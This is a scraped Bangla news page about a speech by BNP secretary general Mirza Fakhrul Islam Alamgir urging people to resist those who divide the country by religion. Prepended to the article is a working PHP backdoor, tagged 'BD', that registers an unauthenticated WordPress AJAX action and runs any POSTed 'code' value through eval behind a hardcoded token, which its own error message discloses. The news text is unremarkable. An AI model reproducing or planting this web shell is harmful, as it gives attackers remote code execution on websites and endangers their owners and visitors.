// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ধর্মের ভিত্তিতে যারা দেশকে বিভাজিত করতে চায় তাদের বিরুদ্ধে রুখে দাঁড়াতে হবে: মির্জা ফখরুল | potrikaybangladesh.com
Sunday, September 27, 2026
Homeঅপরাধধর্মের ভিত্তিতে যারা দেশকে বিভাজিত করতে চায় তাদের বিরুদ্ধে রুখে দাঁড়াতে হবে:...

ধর্মের ভিত্তিতে যারা দেশকে বিভাজিত করতে চায় তাদের বিরুদ্ধে রুখে দাঁড়াতে হবে: মির্জা ফখরুল

ধর্মের ভিত্তিতে যারা দেশকে বিভাজিত করতে চায়, তাদের বিরুদ্ধে রুখে দাঁড়ানোর আহ্বান জানিয়েছেন স্থানীয় সরকার মন্ত্রী ও বিএনপি মহাসচিব মির্জা ফখরুল ইসলাম আলমগীর।

আজ শুক্রবার রাজধানীর ইনস্টিটিউশন অব ডিপ্লোমা ইঞ্জিনিয়ার্স মিলনায়তনে সনাতন ধর্মের নেতাদের সঙ্গে এক মতবিনিময় সভায় তিনি এ আহ্বান জানান।

মির্জা ফখরুল বলেন, ‘আপনারা আমাকে যখনই ডেকেছেন, আমি তখনই এসেছি। আজ অনেক সমস্যা, অনেক চ্যালেঞ্জ, অনেক চড়াই-উতরাই পার হতে হচ্ছে। একটা ক্রিটিক্যাল মোমেন্ট পার হতে হচ্ছে।’

‘গত ১৫ বছরে গণতন্ত্র ধ্বংস হয়ে গিয়েছিল। এই ভয়াবহ অবস্থা থেকে আমরা বেরিয়ে এসেছি। এখন একটা সুযোগ পেয়েছি গণতন্ত্রকে প্রাতিষ্ঠানিক রূপ দেওয়ার। আসুন আমরা সেই চেষ্টা করি,’ বলেন তিনি।

স্থানীয় সরকার মন্ত্রী বলেন, ‘আমরা কাঁধে কাঁধ মিলিয়ে এগিয়ে যাব। অবশ্যই আমরা আমাদের কৃষ্টি-সংস্কৃতিকে সামনে রেখে, আমাদের ১৯৭১ সালের মুক্তিযুদ্ধকে সঙ্গে রেখে, চব্বিশকে সামনে রেখে এগিয়ে যাব। আমরা কোনোটাকেই বাদ দিতে চাই না।’

তিনি আরও বলেন, ‘আমি সবসময় একটা কথা বলি, যারা একাত্তরকে ভুলিয়ে দিতে চায়, তারা কখনো বাংলাদেশে বিশ্বাস করে না। ১৯৭১ সালকে অবশ্যই সামনে আনতে হবে এবং সেটা নিয়েই আমরা সামনে এগিয়ে যাব। একইসঙ্গে আমরা চব্বিশকেও অস্বীকার করতে পারি না, এজন্য যে আমাদের অসংখ্য সন্তান দেশে গণতন্ত্র প্রতিষ্ঠার জন্য প্রাণ দিয়েছে, ফ্যাসিস্ট সরকারকে দেশ থেকে চলে যেতে বাধ্য করেছে।’

‘কোনোটাই আমরা ছোট করে দেখি না। কিন্তু ধর্মের ভিত্তিতে যারা দেশকে বিভাজিত করতে চায়, তাদের বিরুদ্ধে আমাদের রুখে দাঁড়াতে হবে। আমরা এখানে উগ্রবাদকে প্রশ্রয় দিতে পারি না, মৌলবাদকে প্রশ্রয় দিতে পারি না। আমরা এখানে এক উদারপন্থী গণতান্ত্রিক বাংলাদেশ নির্মাণ করতে চাই,’ বলেন তিনি।

সনাতন ধর্মাবলম্বীদের উদ্দেশে বিএনপি মহাসচিব বলেন, ‘আমাদের সরকার সবসময় আপনাদের সঙ্গে আছে, যেন আপনারা নিরাপদ বোধ করেন। আমি পেছনে তাকাতে চাই না। আমরা সামনের দিকে যেতে চাই। আমরা আপনাদের সঙ্গে যেন কোনো বিভেদ সৃষ্টি না হয়, সচেতনভাবে সে ব্যবস্থা করতে চাই।’

‘একটি মহল খুব সচেতনভাবে ধর্মের নামে বিভেদ সৃষ্টি করতে উঠে পড়ে লেগেছে, আপনারা নিশ্চয়ই সেটা লক্ষ্য করেছেন। আমি আপনাদেকে ধন্যবাদ জানাতে চাই যে, নির্বাচনে আপনারা সনাতন ধর্মের মানুষরা বাংলাদেশ জাতীয়তাবাদী দলের রাজনীতিকে সমর্থন দিয়েছেন। এজন্য আমরা আপনাদের কাছে আন্তরিক কৃতজ্ঞ এবং আমরা এই পরিবেশটা ধরে রাখতে চাই,’ বলেন তিনি।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments